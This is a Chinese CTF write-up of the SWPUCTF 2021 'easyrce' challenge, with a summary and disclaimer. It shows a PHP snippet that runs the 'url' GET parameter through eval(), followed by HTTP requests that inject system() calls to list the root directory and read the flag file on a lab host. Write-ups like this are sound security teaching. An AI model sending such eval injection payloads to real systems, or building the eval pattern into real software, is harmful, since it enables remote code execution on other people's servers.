文章总结： 这是一篇CTF题解，分析了SWPUCTF2021新生赛的easyrce题目。文章展示了如何利用PHP代码中的eval()函数漏洞，通过构造恶意的GET参数实现远程代码执行。作者演示了通过system()函数执行系统命令，列出根目录文件并最终获取flag文件的过程。这是一个典型的代码审计和RCE漏洞利用案例。 综合评分： 83 文章分类： CTF,WEB安全,漏洞分析,渗透测试,代码审计

[SWPUCTF 2021 新生赛]easyrce

原创

R0seK1ller

蟹堡安全团队

2025年12月15日 22:01 浙江

免责声明

免责声明：本CTF题解（WP）仅供安全技术研究与教育交流之用，作者不对读者依据本文进行的任何操作承担直接或间接责任。解题过程涉及的技术细节可能触及目标系统漏洞，请务必在合法授权环境或靶机中复现，严禁用于未授权的渗透、破坏或牟利行为。因环境差异、操作失误或理解偏差导致的任何损失，作者及发布平台概不负责。文中引用的工具、脚本与资源均保持原许可证，请遵守对应开源协议。若内容涉侵权或敏感信息，请及时联系删除。阅读即视为同意自行承担全部风险与合规义务。

<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['url']))
{
eval($_GET['url']);
}
?>

关键点:isset($_GET[‘url’])，如果存在 url 查询字符串，就会把它当作 eval 函数的参数传入。

GET /?url=system("ls%20/"); HTTP/1.1
Host: node5.anna.nssctf.cn:21489
Cookie: PHPSESSID=aoohp1l4rga40m1bofvesdpt25
Connection: close

flag藏在根目录的flllllaaaaaaggggggg文件中

GET/?url=system("more%20/flllllaaaaaaggggggg"); HTTP/1.1
Host: node5.anna.nssctf.cn:21489
Cookie: PHPSESSID=aoohp1l4rga40m1bofvesdpt25
Connection: close

查看原文：《[SWPUCTF 2021 新生赛]easyrce》